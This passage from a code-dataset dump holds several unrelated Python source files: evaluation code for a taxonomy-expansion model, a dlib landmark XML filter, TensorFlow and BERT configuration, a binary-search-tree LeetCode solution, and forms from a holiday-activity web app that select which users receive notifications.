test_hyn[t][\"type\"]\r\n for i in range(len(taxo_test)):\r\n target_path = taxo_test.taxo[i][\"path\"]\r\n inner_path = taxo_test.inner_paths[i]\r\n train_path = taxo_test.train_path[test_node][i]\r\n pos_term = taxo_test.pos_term[i]\r\n\r\n if innerpath:\r\n inner = []\r\n freq = []\r\n for z in inner_path:\r\n inner.extend(dep_path[z[0]][\"path\"])\r\n freq.extend(dep_path[z[0]][\"freq\"])\r\n if len(inner) > 100:\r\n sample_idx, sample_freq = random_choice(freq, max_val= 100)\r\n inner = [inner[x] for x in sample_idx]\r\n freq = sample_freq\r\n else:\r\n inner = []\r\n freq = []\r\n dependency_paths = []\r\n dependency_freq = []\r\n for y in train_path:\r\n\r\n if y == None:\r\n dependency_paths.append([])\r\n dependency_freq.append([])\r\n elif len(dep_path[y[0]][\"path\"]) > 100: # sample 50 paths if there is too much dependency path\r\n sample_idx, sample_freq = random_choice(dep_path[y[0]][\"freq\"], max_val= 100)\r\n #print(dep_path[xx][\"path\"], dep_path[xx][\"freq\"], sample_idx, sample_freq)\r\n dependency_paths.append([dep_path[y[0]][\"path\"][x] for x in sample_idx])\r\n dependency_freq.append(sample_freq)\r\n else:\r\n dependency_paths.append(dep_path[y[0]][\"path\"])\r\n 
dependency_freq.append(dep_path[y[0]][\"freq\"])\r\n score, embed_preds, paths_preds, taxi_preds = models(target_path = target_path, inner_path = inner, inner_freq = freq, attach = test_node, \\\r\n attach_path = dependency_paths, attach_freq = dependency_freq, device = device, compound = compound)\r\n \r\n if is_softmax:\r\n #print(score)\r\n score = F.softmax(score, dim = 1)\r\n #print(score)\r\n score = score.detach().cpu().numpy().reshape(-1)\r\n #print(score)\r\n score_tmp.append({str(int(x)): '%.3f'%y for (x,y) in zip(pos_term, score)})\r\n #print(score.shape[0], len(pos_term))\r\n for e,s in zip(pos_term, score):\r\n if e not in score_t:\r\n score_t[e] = [s]\r\n else:\r\n score_t[e].append(s)\r\n l = len(score_t)\r\n score_save[t] = score_tmp\r\n if attach_pos in score_t:\r\n ranklst = [ np.mean(score_t[attach_pos]) ]\r\n for r in score_t:\r\n if r != attach_pos:\r\n ranklst.append( np.mean(score_t[r]) )\r\n rank_ = getrank(ranklst, idx = 0)\r\n if rank_ == 1:\r\n correct += 1\r\n total += 1\r\n rank.append(rank_)\r\n score_pred[t] = score_t\r\n\r\n write_json('../log_result/%s_%s_%d_score.json'%(args.encode_dep, args.encode_prop, epoch), score_save)\r\n if synonym:\r\n pass\r\n print('\\n=> Testing: Mean Rank:%.2f/%d, Acc = %.3f'%(np.mean(rank), l, float(correct/total)))\r\n \r\ndef testing_f1(models, taxo_test, device, test_syn, test_hyn, dep_path, epoch, args, inv_paths_index, metric= 'mean', is_softmax = False, compound = False, synonym = True, innerpath= False):\r\n models.eval() \r\n wum = np.loadtxt('%s/wum.txt'%(args.fp))\r\n y_true = []\r\n y_pred = []\r\n score_pred = {} # score all score for nodes [format: attach_term:{all score dict} ]\r\n score_one = {} # score all score for nodes [format: attach_term:{overall score with the attach node} ]\r\n score_best = {} # [format: attach_term:{best score with the attach node} ]\r\n score_save_dict = {}\r\n attach_term_list = [] # attached node in test set in the taxo\r\n to_attached_number = len(test_hyn)\r\n rank = []\r\n wup = []\r\n correct = 0 \r\n total = 0\r\n total_rank = 0\r\n score_save = {}\r\n rank_save = {}\r\n path_save = {}\r\n score_test_save = {}\r\n target_paths = [taxo_test.taxo[i][\"path\"] for i in range(len(taxo_test))]\r\n inner_paths = [taxo_test.inner_paths[i] for i in range(len(taxo_test))]\r\n train_paths = {int(x):taxo_test.train_path[int(x)] for x in test_hyn}\r\n pos_terms = [taxo_test.pos_term[i] for i in range(len(taxo_test))]\r\n num_of_paths={}\r\n\r\n attach_pos_gold = {int(t):int(test_hyn[t][\"attach\"]) for t in test_hyn}\r\n for t in tqdm(test_hyn):\r\n score_t = {} # all score\r\n one_score = {} #one score(do average)\r\n score_tmp = []\r\n test_node = int(t)\r\n num_paths = {}\r\n attach_pos = int(test_hyn[t][\"attach\"])\r\n relation_type = test_hyn[t][\"type\"]\r\n for i in range(len(taxo_test)):\r\n target_path = taxo_test.taxo[i][\"path\"]\r\n inner_path = taxo_test.inner_paths[i]\r\n train_path = taxo_test.train_path[test_node][i]\r\n pos_term = taxo_test.pos_term[i]\r\n #print(target_path, inner_path, pos_term)\r\n\r\n if innerpath:\r\n inner = []\r\n freq = []\r\n for z in inner_path:\r\n inner.extend(dep_path[z[0]][\"path\"])\r\n freq.extend(dep_path[z[0]][\"freq\"])\r\n #print(inner,freq)\r\n if len(inner) > 100:\r\n sample_idx, sample_freq = random_choice(freq, max_val= 100)\r\n inner = [inner[x] for x in sample_idx]\r\n freq = sample_freq\r\n else:\r\n inner = []\r\n freq = []\r\n dependency_paths = []\r\n dependency_freq = []\r\n for i, y in enumerate(train_path):\r\n 
num_paths[target_path[i][0]] = len(dep_path[y[0]][\"path\"]) if y!=None else 0\r\n if y == None:\r\n dependency_paths.append([])\r\n dependency_freq.append([])\r\n elif len(dep_path[y[0]][\"path\"])>100: # sample 50 paths if there is too much dependency path\r\n sample_idx, sample_freq = random_choice(dep_path[y[0]][\"freq\"], max_val= 100)\r\n #print(dep_path[xx][\"path\"], dep_path[xx][\"freq\"], sample_idx, sample_freq)\r\n dependency_paths.append([dep_path[y[0]][\"path\"][x] for x in sample_idx])\r\n dependency_freq.append(sample_freq)\r\n else:\r\n dependency_paths.append(dep_path[y[0]][\"path\"])\r\n dependency_freq.append(dep_path[y[0]][\"freq\"])\r\n score, embed_preds, paths_preds, taxi_preds = models(target_path = target_path, inner_path = inner, inner_freq = freq, attach = test_node, \\\r\n attach_path = dependency_paths, attach_freq = dependency_freq, device = device, compound = compound)\r\n if is_softmax:\r\n score = F.softmax(score, dim = 1)\r\n score = score.detach().cpu().numpy().reshape(-1)\r\n embed_preds, paths_preds, taxi_preds = embed_preds.detach().cpu().numpy().reshape(-1),paths_preds.detach().cpu().numpy().reshape(-1),taxi_preds.detach().cpu().numpy().reshape(-1)\r\n\t\t\t\r\n score_tmp.append({str(int(x)): 'o:%.3f,emb:%.3f,dep:%.3f,taxi:%.3f'%(y, y1, y2, y3) for (x, y, y1, y2, y3) in zip(pos_term, score, embed_preds, paths_preds, taxi_preds)})\r\n '''\r\n we calculate the score of all terms for term t here (e is the term in train taxo)\r\n '''\r\n for e,s in zip(pos_term, score):\r\n if e not in score_t:\r\n score_t[e] = [s]\r\n else:\r\n score_t[e].append(s)\r\n l = len(score_t)\r\n #optim_pos = 0\r\n if attach_pos in score_t:\r\n ranklst = [ scipy.stats.gmean(score_t[attach_pos]) if is_softmax else np.mean(score_t[attach_pos]) ]\r\n optim_pos = attach_pos\r\n maxval = ranklst[0]\r\n #print('##########', num_paths[attach_pos], '#########')\r\n for r in score_t:\r\n if r != attach_pos:\r\n ranklst.append( scipy.stats.gmean(score_t[r]) if is_softmax else np.mean(score_t[r]) )\r\n if ranklst[-1] > maxval:\r\n optim_pos = r\r\n maxval = ranklst[-1]\r\n if optim_pos == attach_pos:\r\n wup.append(1)\r\n else:\r\n wup.append(wum[optim_pos, attach_pos])\r\n\r\n rank_ = getrank(ranklst, idx = 0)\r\n if rank_ == 1:\r\n\r\n correct += 1\r\n total_rank += 1\r\n rank.append(rank_)\r\n score_save[t] = score_tmp#\r\n score_test_save[t] = np.float(np.mean(score_t[attach_pos]))\r\n rank_save[t] = rank_\r\n path_save[t] = num_paths[attach_pos]\r\n\r\n score_pred[t] = score_t\r\n num_of_paths[test_node] = num_paths\r\n '''\r\n For all nodes, we calculate the mean score and get the highest score with the corresponding location\r\n '''\r\n for r in score_t:\r\n if metric =='mean':\r\n one_score[r] = np.float(scipy.stats.gmean(score_t[r])) if is_softmax else np.float(np.mean(score_t[r]))\r\n else:\r\n one_score[r] = np.max(score_t[r])\r\n '''\r\n Get maximum score for all nodes, decide the place to insert the node\r\n '''\r\n best_val, best_attach = get_max_from_dict(one_score) # attach: is the node in original taxo\r\n score_one[t] = one_score\r\n score_best[t] = {'best_val': best_val, 'attach': best_attach} # t: term in test set\r\n acc3 = getacc(rank, 3)\r\n acc5 = getacc(rank, 5)\r\n mrr = np.mean([1/x for x in rank])\r\n wup_score = np.mean(wup)\r\n if 'science_wordnet' in args.model_name:\r\n dataset = 'science_wordnet_en'\r\n elif 'env' in args.model_name and 'eurovoc' in args.model_name:\r\n dataset = 'environment_eurovoc_en'\r\n elif 'food_wordnet' in args.model_name:\r\n 
dataset = 'food_wordnet_en'\r\n else:\r\n dataset = 'unknown'\r\n if args.encode_prop in ['linear', 'none'] and epoch>1 and args.layers == 2:\r\n np.savetxt('../log_result/param_layer1_%d_%s.txt'%(epoch, args.model_name), models.gc2.mlp.dense0.weight.detach().cpu().numpy(), fmt = '%.5f')\r\n np.savetxt('../log_result/param_layer2_%d_%s.txt'%(epoch, args.model_name), models.gc2.mlp.dense1.weight.detach().cpu().numpy(), fmt = '%.5f')\r\n if epoch >= 0:\r\n write_json('../data_train_test_path/path_cnt_%s.json'%(dataset), num_of_paths)\r\n write_json('../log_result/rank_test_%d_%s.json'%(epoch, args.model_name), rank_save)\r\n write_json('../log_result/score_test_%d_%s.json'%(epoch, args.model_name), score_test_save)\r\n write_json('../log_result/score_%d_%s.json'%(epoch, args.model_name), score_save)\r\n write_json('../log_result/path_test_%d_%s.json'%(epoch, args.model_name), path_save)\r\n import time\r\n with open('../log_result/%s.txt'%(args.model_name), 'a+') as f:\r\n f.write('Time: %s @ Mean Rank:%.2f/%d, Acc: %.4f, Acc@3:%.4f Acc@5:%.4f mrr:%.4f wup:%.4f '%(time.ctime(), np.mean(rank), l, float(correct/total_rank),acc3,acc5,mrr,wup_score))\r\n f.write('\\n')\r\n print('@ Mean Rank:%.2f/%d, Acc: %.4f, Acc@3:%.4f Acc@5:%.4f mrr:%.4f wup:%.4f '%( np.mean(rank), l, float(correct/total_rank),acc3,acc5,mrr,wup_score))\r\n print('=> Testing: Mean Rank:%.2f/%d, Acc = %.3f'%(np.mean(rank), l, float(correct/total_rank)))\r\n # score_one={}(given item, output score), score_pred={}(given item, output all scores)\r\n '''\r\n attach the node in the test set and design new paths\r\n ## this case consider all nodes / this setting is not considered in evaluation part --> we only consider leaf nodes \r\n '''\r\n correct = 0\r\n ranks = []\r\n wums = []\r\n item_, attach_ = select_node_to_attach(score_best) #Item: term in the test, attach_: term in the taxo \r\n item_, attach_ = int(item_), int(attach_)\r\n total += 1\r\n tmp_rank = 1\r\n if attach_pos_gold[item_] == attach_:\r\n correct += 1\r\n ranks.append(1)\r\n wums.append(1)\r\n else:\r\n gold_position =attach_pos_gold[item_]\r\n if gold_position in score_one[str(item_)]:\r\n for term in score_one[str(item_)]:\r\n if score_one[str(item_)][term] > score_one[str(item_)][gold_position]:\r\n tmp_rank += 1\r\n ranks.append(tmp_rank)\r\n wums.append(wum[gold_position, attach_])\r\n\r\n print('attach %d to %d, gold %d'%( int(item_), int(attach_), int(attach_pos_gold[item_])) )\r\n '''\r\n update the score one by one\r\n '''\r\n taxo_test.parent[item_] = attach_\r\n attach_term_list.append(item_)\r\n\r\n attach_path = []\r\n node = item_\r\n for _ in range(args.path_len):\r\n attach_path.append(node)\r\n if node not in taxo_test.parent:\r\n break\r\n node = taxo_test.parent[node]\r\n to_attached_number -= 1\r\n while to_attached_number > 0:\r\n if len(attach_path) == args.path_len:\r\n target_path = [[x] for x in attach_path]\r\n inner_path = []\r\n for _ in range(args.path_len-1):\r\n inner_path.extend(get_path_from_terms(target_path[_], target_path[_+1], inv_paths_index))\r\n #train_path = \r\n pos_term = attach_path\r\n for t in test_hyn:\r\n if t in attach_term_list:\r\n continue\r\n score_t = {}\r\n \ttest_node = int(t)\r\n train_path = get_path_from_attach_terms(t, target_path, args.path_len, inv_paths_index, synonym)\r\n if innerpath:\r\n inner = []\r\n freq = []\r\n for z in inner_path:\r\n inner.extend(dep_path[z[0]][\"path\"])\r\n freq.extend(dep_path[z[0]][\"freq\"])\r\n #print(inner,freq)\r\n if len(inner) > 100:\r\n sample_idx, sample_freq = 
random_choice(freq, max_val= 100)\r\n inner = [inner[x] for x in sample_idx]\r\n freq = sample_freq\r\n else:\r\n inner = []\r\n freq = []\r\n dependency_paths = []\r\n dependency_freq = []\r\n for y in train_path:\r\n if y == None:\r\n dependency_paths.append([])\r\n dependency_freq.append([])\r\n elif len(dep_path[y[0]][\"path\"])>100: # sample 50 paths if there is too much dependency path\r\n sample_idx, sample_freq = random_choice(dep_path[y[0]][\"freq\"], max_val= 100)\r\n #print(dep_path[xx][\"path\"], dep_path[xx][\"freq\"], sample_idx, sample_freq)\r\n dependency_paths.append([dep_path[y[0]][\"path\"][x] for x in sample_idx])\r\n dependency_freq.append(sample_freq)\r\n else:\r\n dependency_paths.append(dep_path[y[0]][\"path\"])\r\n dependency_freq.append(dep_path[y[0]][\"freq\"])\r\n score, embed_preds, paths_preds, taxi_preds = models(target_path = target_path, inner_path = inner, inner_freq = freq, attach = test_node, \\\r\n attach_path = dependency_paths, attach_freq = dependency_freq, device = device, compound = compound)\r\n if args.encode_prop == 'attn':\r\n s=np.around(attn.astype(np.float64), decimals=2)\r\n #print(list([list(x) for x in s[1]]))\r\n if is_softmax:\r\n score = F.softmax(score, dim = 1)\r\n score = score.detach().cpu().numpy().reshape(-1)\r\n for e,s in zip(pos_term, score):\r\n if e not in score_t:\r\n score_t[e] = [s]\r\n else:\r\n score_t[e].append(s)\r\n for attach_item in score_t:\r\n if attach_item in score_pred[t]:\r\n score_pred[t][attach_item].extend(score_t[attach_item])\r\n else:\r\n score_pred[t][attach_item] = score_t[attach_item]\r\n if metric =='mean':\r\n score_one[t][attach_item] = scipy.stats.gmean(score_pred[t][attach_item]) if is_softmax else np.mean(score_pred[t][attach_item])\r\n else:\r\n score_one[t][attach_item] = np.max(score_pred[t][attach_item])\r\n\r\n best_val, best_attach = get_max_from_dict(score_one[t]) # attach: is the node in original taxo\r\n #score_one[t] = one_score\r\n score_best[t] = {'best_val': best_val, 'attach': best_attach} # t: term in test set\r\n item_, attach_ = select_node_to_attach(score_best, attach_term_list) #Item: term in the test, attach_: term in the taxo \r\n item_, attach_ = int(item_), int(attach_)\r\n total += 1\r\n tmp_rank = 1\r\n if attach_pos_gold[item_] == attach_:\r\n correct += 1\r\n wums.append(1)\r\n ranks.append(1)\r\n else:\r\n gold_position = attach_pos_gold[item_]\r\n #print([gold_position], score_one[str(item_)].keys() )\r\n if gold_position in score_one[str(item_)]:\r\n for term in score_one[str(item_)]:\r\n if score_one[str(item_)][term] > score_one[str(item_)][gold_position]:\r\n tmp_rank += 1\r\n ranks.append(tmp_rank)\r\n wums.append(wum[gold_position, attach_])\r\n taxo_test.parent[item_] = attach_\r\n attach_term_list.append(item_)\r\n\r\n attach_path = []\r\n node = item_\r\n for _ in range(args.path_len):\r\n attach_path.append(node)\r\n if node not in taxo_test.parent:\r\n break\r\n node = taxo_test.parent[node]\r\n #print(item_,attach_, attach_pos_gold[item_])\r\n #print('attach %d to %d, gold %d'%( int(item_), int(attach_), int(attach_pos_gold[item_])) )\r\n if (int(item_), int(attach_)) in inv_paths_index:\r\n dep_num1 = len(dep_path[inv_paths_index[(int(item_), int(attach_))]][\"path\"])\r\n else:\r\n dep_num1 = 0\r\n if (int(item_), int(attach_pos_gold[item_]) ) in inv_paths_index:\r\n dep_num2 = len(dep_path[inv_paths_index[(int(item_), int(attach_pos_gold[item_]))]][\"path\"])\r\n else:\r\n dep_num2 = 0\r\n to_attached_number -= 1\r\n\r\n 
#write_json('../log_result/%s_%s_%s_%d_score.json'%(args.model_name, args.encode_dep, args.encode_prop, epoch), score_)\r\n if synonym:\r\n pass\r\n #print(ranks,wums)\r\n mrr = np.mean([1/x for x in ranks])\r\n acc3 = getacc(ranks, 3)\r\n acc5 = getacc(ranks, 5)\r\n print('=> Testing: Mean Rank:%d/%d, Acc = %.4f, Acc@3 = %.4f, Acc@5 = %.4f, wum = %.4f, mrr = %.4f'%(correct, total, float(correct/len(ranks)), acc3,acc5,np.mean(wums), mrr))\r\n\r\ndef getacc(rank, k):\r\n return len([x for x in rank if x<=k])/len(rank)\r\ndef get_max_from_dict(one_score):\r\n best_val = -10000\r\n best_attach = -10000\r\n for z in one_score:\r\n if one_score[z] > best_val:\r\n best_val = one_score[z]\r\n best_attach = z\r\n return best_val, best_attach\r\n\r\ndef select_node_to_attach(score_best, attached = []):\r\n best_val = -10000\r\n best_attach = -100000\r\n best_item = -10000\r\n for item in score_best:\r\n if int(item) not in attached:\r\n if score_best[item][\"best_val\"] > best_val:\r\n best_val = score_best[item][\"best_val\"]\r\n best_attach = score_best[item][\"attach\"]\r\n best_item = item\r\n else:\r\n pass\r\n #print(item, attached)\r\n return best_item, best_attach\r\n\r\ndef get_path_from_terms_with_synonym(src, tgt, inv_paths_index):\r\n paths = []\r\n for s in src:\r\n for t in tgt:\r\n if (s,t) in inv_paths_index:\r\n paths.append(inv_paths_index[(s,t)])\r\n return paths\r\n\r\ndef get_path_from_attach_terms(attach, original, length, inv_paths_index, synonym):\r\n #attach: a number\r\n #original: a \r\n path = []\r\n if synonym:\r\n for o in original:\r\n if (attach, o[0]) in inv_paths_index:\r\n path.append([inv_paths_index[(attach, o[0])]])\r\n else:\r\n path.append(None)\r\n else:\r\n for o in original:\r\n path_tmp = []\r\n for x in o:\r\n if (attach, x) in inv_paths_index:\r\n path_tmp.append(inv_paths_index[(attach, o[0])]) \r\n path.append(path_tmp if len(path_tmp)>0 else None)\r\n assert len(path) == length\r\n return path \r\n\r\ndef get_path_from_terms(src, tgt, inv_paths_index):\r\n paths = []\r\n s = src[0]\r\n t = tgt[0]\r\n if (s,t) in inv_paths_index:\r\n paths.append(inv_paths_index[(s,t)])\r\n return paths ","repo_name":"yueyu1030/STEAM","sub_path":"model/test_fuse.py","file_name":"test_fuse.py","file_ext":"py","file_size_in_byte":22252,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"16"} +{"seq_id":"72881250568","text":"# Import necessary packages\nimport argparse\nimport re #This module provides regular expression matching operations similar to those found in Perl.\n\n# Construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\n# The script required input and output\nap.add_argument(\"-i\", \"--input\", required=True, help=\"path to iBug 300-W data split XML file\")\nap.add_argument(\"-t\", \"--output\", required=True, help=\"path to output data split XML file\")\n\nargs = vars(ap.parse_args())\n\n# Define the indices of our eye coordinates\nLANDMARKS = set(list(range(36, 48)))\n\n# Define regular expression and load the original XML file:\n# Parsing out eye locations from the XML file:\n# use a regular expression to determine if there's a \"part\"\n# element on any given line\nPART = re.compile(\"part name='[0-9]+'\") # Extracts part elements along with their names/indexes\n\n# Load the contents of the original XML file and open the output file for writing\n\nprint(\"[INFO] parsing data split XML file..\")\nrows = open(args[\"input\"]).read().strip().split(\"\\n\") # Loads content of input XML 
file\noutput = open(args[\"output\"], \"w\") # Opens output XML file for writing\n\n# Loop over the input XML file to find and extract the eye landmarks:\n\nfor row in rows:\n # Loop over ther rows of the input XML file.\n # Check if the current line has (x, y)-coordinates for the facial landmarks we're interested in\n parts = re.findall(PART, row) # Find all PART in row\n\n # if there's no info related to the coordinates\n # related to facial landmarks, we write to disk \n # with no further modifications\n if len(parts) == 0:\n output.write(\"{}\\n\".format(row))\n\n # Otherwise, there is annotation information we must process\n else: # Parse it further\n # parse out the name of the attribute from the row\n attr = \"name='\"\n i = row.find(attr)\n j = row.find(\"'\", i + len(attr) + 1)\n name = int(row[i + len(attr):j])\n\n # if the facial landmark name exists\n # within the range of our indexes, write to our\n # output file\n if name in LANDMARKS: \n output.write(\"{}\\n\".format(row))\n\n# Close the output file\noutput.close()","repo_name":"brunocamps/eye-detection-dlib","sub_path":"parse_xml.py","file_name":"parse_xml.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4913774586","text":"import six\nimport json\n\nimport tensorflow as tf\n\n\nFLAGS = tf.flags.FLAGS\n\n# Model parameters\ntf.flags.DEFINE_integer(\"hidden_size\", 64, \"Size of LSTM hidden layer.\")\ntf.flags.DEFINE_integer(\"memory_size\", 16, \"The number of memory slots.\")\ntf.flags.DEFINE_integer(\"word_size\", 16, \"The width of each memory slot.\")\ntf.flags.DEFINE_integer(\"num_write_heads\", 1, \"Number of memory write heads.\")\ntf.flags.DEFINE_integer(\"num_read_heads\", 4, \"Number of memory read heads.\")\ntf.flags.DEFINE_integer(\"clip_value\", 20,\n \"Maximum absolute value of controller and dnc outputs.\")\n\n# Optimizer parameters.\ntf.flags.DEFINE_float(\"max_grad_norm\", 50, \"Gradient clipping norm limit.\")\ntf.flags.DEFINE_float(\"learning_rate\", 1e-4, \"Optimizer learning rate.\")\ntf.flags.DEFINE_float(\"optimizer_epsilon\", 1e-10,\n \"Epsilon used for RMSProp optimizer.\")\n\n# Task parameters\ntf.flags.DEFINE_integer(\"batch_size\", 16, \"Batch size for training.\")\ntf.flags.DEFINE_integer(\"num_bits\", 4, \"Dimensionality of each vector to copy\")\ntf.flags.DEFINE_integer(\n \"min_length\", 1,\n \"Lower limit on number of vectors in the observation pattern to copy\")\ntf.flags.DEFINE_integer(\n \"max_length\", 2,\n \"Upper limit on number of vectors in the observation pattern to copy\")\ntf.flags.DEFINE_integer(\"min_repeats\", 1,\n \"Lower limit on number of copy repeats.\")\ntf.flags.DEFINE_integer(\"max_repeats\", 2,\n \"Upper limit on number of copy repeats.\")\n\nhparams = []\n\n\nclass BertConfig(object):\n \"\"\"Configuration for `BertModel`.\"\"\"\n\n def __init__(self,\n vocab_size,\n hidden_size=768,\n num_hidden_layers=12,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=16,\n initializer_range=0.02):\n \"\"\"Constructs BertConfig.\n\n Args:\n vocab_size: Vocabulary size of `inputs_ids` in `BertModel`.\n hidden_size: Size of the encoder layers and the pooler layer.\n num_hidden_layers: Number of hidden layers in the Transformer encoder.\n num_attention_heads: Number of attention heads for each attention layer in\n the Transformer encoder.\n 
intermediate_size: The size of the \"intermediate\" (i.e., feed-forward)\n layer in the Transformer encoder.\n hidden_act: The non-linear activation function (function or string) in the\n encoder and pooler.\n hidden_dropout_prob: The dropout probability for all fully connected\n layers in the embeddings, encoder, and pooler.\n attention_probs_dropout_prob: The dropout ratio for the attention\n probabilities.\n max_position_embeddings: The maximum sequence length that this model might\n ever be used with. Typically set this to something large just in case\n (e.g., 512 or 1024 or 2048).\n type_vocab_size: The vocabulary size of the `token_type_ids` passed into\n `BertModel`.\n initializer_range: The stdev of the truncated_normal_initializer for\n initializing all weight matrices.\n \"\"\"\n self.vocab_size = vocab_size\n self.hidden_size = hidden_size\n self.num_hidden_layers = num_hidden_layers\n self.num_attention_heads = num_attention_heads\n self.hidden_act = hidden_act\n self.intermediate_size = intermediate_size\n self.hidden_dropout_prob = hidden_dropout_prob\n self.attention_probs_dropout_prob = attention_probs_dropout_prob\n self.max_position_embeddings = max_position_embeddings\n self.type_vocab_size = type_vocab_size\n self.initializer_range = initializer_range\n\n @classmethod\n def from_dict(cls, json_object):\n \"\"\"Constructs a `BertConfig` from a Python dictionary of parameters.\"\"\"\n config = BertConfig(vocab_size=None)\n for (key, value) in six.iteritems(json_object):\n config.__dict__[key] = value\n return config\n\n @classmethod\n def from_json_file(cls, json_file):\n \"\"\"Constructs a `BertConfig` from a json file of parameters.\"\"\"\n with tf.gfile.GFile(json_file, \"r\") as reader:\n text = reader.read()\n return cls.from_dict(json.loads(text))\n\n def to_dict(self):\n \"\"\"Serializes this instance to a Python dictionary.\"\"\"\n output = copy.deepcopy(self.__dict__)\n return output\n\n def to_json_string(self):\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n return json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"\n","repo_name":"gaceladri/draft","sub_path":"code/hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28274888593","text":"# Use BST property. If both p and q are less than root, recurse on root left, similarly for root right. Else return root.\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n while root:\n if p.val < root.val and q.val < root.val:\n root = root.left\n elif p.val > root.val and q.val > root.val:\n root = root.right\n else:\n return root\n","repo_name":"rohitpatwa/leetcode","sub_path":"235. Lowest Common Ancestor of a Binary Search Tree.py","file_name":"235. 
Lowest Common Ancestor of a Binary Search Tree.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"7677483272","text":"from onegov.activity import Activity\nfrom onegov.activity import Booking, BookingCollection\nfrom onegov.activity import Occasion, OccasionCollection\nfrom onegov.activity import Period\nfrom onegov.core.orm import as_selectable_from_path\nfrom onegov.core.utils import module_path\nfrom onegov.feriennet import _\nfrom onegov.feriennet.collections import BillingCollection\nfrom onegov.feriennet.layout import DefaultLayout\nfrom onegov.feriennet.models import NotificationTemplate\nfrom onegov.form import Form\nfrom onegov.form.fields import MultiCheckboxField\nfrom onegov.user import User, UserCollection\nfrom sqlalchemy import distinct, or_, func, and_, select, exists\nfrom uuid import uuid4\nfrom wtforms.fields import StringField, TextAreaField, RadioField, SelectField\nfrom wtforms.validators import InputRequired\n\n\nclass NotificationTemplateForm(Form):\n\n subject = StringField(\n label=_(\"Subject\"),\n validators=[InputRequired()]\n )\n\n text = TextAreaField(\n label=_(\"Message\"),\n validators=[InputRequired()],\n render_kw={'rows': 12}\n )\n\n def ensure_not_duplicate_subject(self):\n c = exists().where(NotificationTemplate.subject == self.subject.data)\n\n # in edit mode we must exclude the current model\n if isinstance(self.model, NotificationTemplate):\n c = c.where(NotificationTemplate.id != self.model.id)\n\n if self.request.session.query(c).scalar():\n self.subject.errors.append(\n _(\"A notification with this subject exists already\")\n )\n\n return False\n\n\nclass NotificationTemplateSendForm(Form):\n\n send_to = RadioField(\n label=_(\"Send to (applies to active period only)\"),\n choices=[\n ('myself', _(\n \"Myself\"\n )),\n ('active_organisers', _(\n \"Organisers with an occasion\"\n )),\n ('by_role', _(\n \"Users of a given role\"\n )),\n ('with_wishlist', _(\n \"Users with wishes\"\n )),\n ('with_bookings', _(\n \"Users with bookings\"\n )),\n ('with_unpaid_bills', _(\n \"Users with unpaid bills\"\n )),\n ('by_occasion', _(\n \"Users with attendees of a given occasion\"\n )),\n ],\n default='by_role'\n )\n\n period = SelectField(\n label=_(\"Period\"),\n choices=None,\n depends_on=('send_to', 'with_unpaid_bills'),\n )\n\n roles = MultiCheckboxField(\n label=_(\"Role\"),\n choices=[\n ('admin', _(\"Administrators\")),\n ('editor', _(\"Organisers\")),\n ('member', _(\"Members\"))\n ],\n depends_on=('send_to', 'by_role')\n )\n\n occasion = MultiCheckboxField(\n label=_(\"Occasion\"),\n choices=None,\n depends_on=('send_to', 'by_occasion')\n )\n\n state = MultiCheckboxField(\n label=_(\"Useraccounts\"),\n choices=[\n ('active', _(\"Active users\")),\n ('inactive', _(\"Inactive users\")),\n ],\n default=['active'],\n )\n\n def on_request(self):\n self.populate_occasion()\n self.populate_periods()\n\n @property\n def has_choices(self):\n return self.request.is_admin or bool(self.occasion.choices)\n\n @property\n def recipients(self):\n if self.send_to.data == 'myself':\n return {self.request.current_username}\n\n elif self.send_to.data == 'by_role':\n recipients = self.recipients_by_role(self.roles.data)\n\n elif self.send_to.data == 'by_occasion':\n recipients = self.recipients_by_occasion(self.occasion.data)\n\n elif self.send_to.data == 'with_wishlist':\n recipients = self.recipients_with_wishes()\n\n elif self.send_to.data == 'with_bookings':\n 
recipients = self.recipients_with_bookings()\n\n elif self.send_to.data == 'active_organisers':\n recipients = self.recipients_which_are_active_organisers()\n\n elif self.send_to.data == 'with_unpaid_bills':\n recipients = self.recipients_with_unpaid_bills()\n\n else:\n raise NotImplementedError\n\n return recipients & self.recipients_pool\n\n @property\n def recipients_pool(self):\n users = UserCollection(self.request.session)\n users = users.query()\n\n if self.state.data == ['active']:\n users = users.filter(User.active == True)\n elif self.state.data == ['inactive']:\n users = users.filter(User.active == False)\n elif self.state.data != ['active', 'inactive']:\n return set()\n\n return {u.username for u in users.with_entities(User.username)}\n\n def recipients_by_role(self, roles):\n if not roles:\n return set()\n\n users = UserCollection(self.request.session)\n\n q = users.by_roles(*roles)\n q = q.filter(User.active == True)\n q = q.with_entities(User.username)\n\n return {u.username for u in q}\n\n def recipients_with_wishes(self):\n bookings = BookingCollection(self.request.session)\n period = self.request.app.active_period\n\n if not period.wishlist_phase:\n return set()\n\n q = bookings.query()\n q = q.join(Period)\n\n q = q.filter(Period.active == True)\n q = q.with_entities(distinct(Booking.username).label('username'))\n\n return {b.username for b in q}\n\n def recipients_with_bookings(self):\n bookings = BookingCollection(self.request.session)\n period = self.request.app.active_period\n\n if period.wishlist_phase:\n return set()\n\n q = bookings.query()\n q = q.join(Period)\n\n q = q.filter(Period.active == True)\n q = q.with_entities(distinct(Booking.username).label('username'))\n\n return {b.username for b in q}\n\n def recipients_which_are_active_organisers(self):\n occasions = OccasionCollection(self.request.session)\n\n q = occasions.query()\n q = q.join(Activity)\n q = q.join(Period)\n q = q.filter(Period.active == True)\n q = q.filter(Occasion.cancelled == False)\n\n q = q.with_entities(distinct(Activity.username).label('username'))\n\n return 